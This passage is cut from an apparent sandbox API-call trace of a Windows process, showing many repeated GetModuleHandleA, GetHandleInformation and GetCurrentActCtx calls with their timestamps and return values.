lpdwFlags=0x0) returned 0 [0092.126] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.126] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.126] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.127] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.127] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.127] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.127] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.127] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.127] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.127] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.128] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.128] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.128] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.128] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.128] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.128] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.129] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.129] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.129] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.129] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.129] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.129] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.129] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.129] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.129] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.130] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.130] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.130] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.130] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.130] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.130] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.130] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.130] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.130] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.131] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.131] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.131] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.131] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.131] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.131] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.132] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.132] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.132] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.132] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.132] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.132] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.133] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.133] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.133] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.133] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.133] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.133] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.133] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.133] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.133] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.134] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.134] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.134] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.134] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.212] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.212] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.212] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.212] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.213] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.213] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.213] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.213] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.213] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.213] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.213] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.213] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.213] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.213] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.213] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.214] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.214] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.214] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.214] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.214] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.214] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.214] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.214] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.214] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.214] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.214] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.214] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.215] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.215] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.215] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.215] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.215] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.215] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.215] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.215] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.215] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.215] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.215] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.215] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.215] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.215] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.216] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.216] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.216] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.216] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.216] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.216] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.216] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.216] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.216] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.216] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.216] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.216] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.217] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.217] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.217] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.217] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.217] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.217] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.217] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.217] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.217] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.217] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.217] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.217] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.218] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.218] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.218] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.218] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.218] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.218] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.218] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.218] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.218] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.219] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.219] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.219] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.219] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.219] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.219] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.219] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.219] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.219] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.219] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.219] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.219] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.220] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.220] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.220] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.220] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.220] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.220] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.220] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.220] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.220] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.221] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.221] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.221] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.221] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.221] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.221] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.221] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.221] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.221] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.221] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.221] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.221] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.222] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.222] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.222] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.222] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.222] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.222] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.222] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.222] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.222] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.222] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.222] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.222] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.223] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.223] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.223] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.223] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.223] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.223] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.223] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.223] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.223] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.223] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.223] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.223] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.224] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.224] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.224] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.224] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.224] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.224] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.224] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.224] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.224] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.225] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.225] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.225] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.225] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.225] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.225] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.225] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.225] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.225] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.225] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.225] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.225] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.225] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.226] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.226] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.226] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.226] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.226] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.226] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.226] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.226] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.226] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.226] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.226] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.227] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.227] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.227] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.227] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.227] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.227] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.227] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.227] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.227] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.227] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.227] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.227] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.228] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.228] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.228] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.228] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.228] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.228] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.228] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.229] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.229] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.229] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.229] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.229] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.229] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.229] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.229] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.229] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.229] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.229] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.229] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.229] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.230] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.230] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.230] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.230] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.230] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.230] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.230] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.230] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.230] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.230] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.230] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.231] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.231] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.231] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.231] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.231] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.231] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.231] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.231] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.231] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.231] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.231] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.232] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.232] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.232] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.232] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.232] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.232] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.232] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.232] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.232] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.232] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.232] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.232] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.233] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.233] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.233] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.233] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.233] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.233] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.233] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.233] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.233] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.233] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.233] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.233] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.234] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.234] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.234] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.234] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.234] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.234] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.234] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.234] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.234] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0092.234] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0092.234] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0092.234] 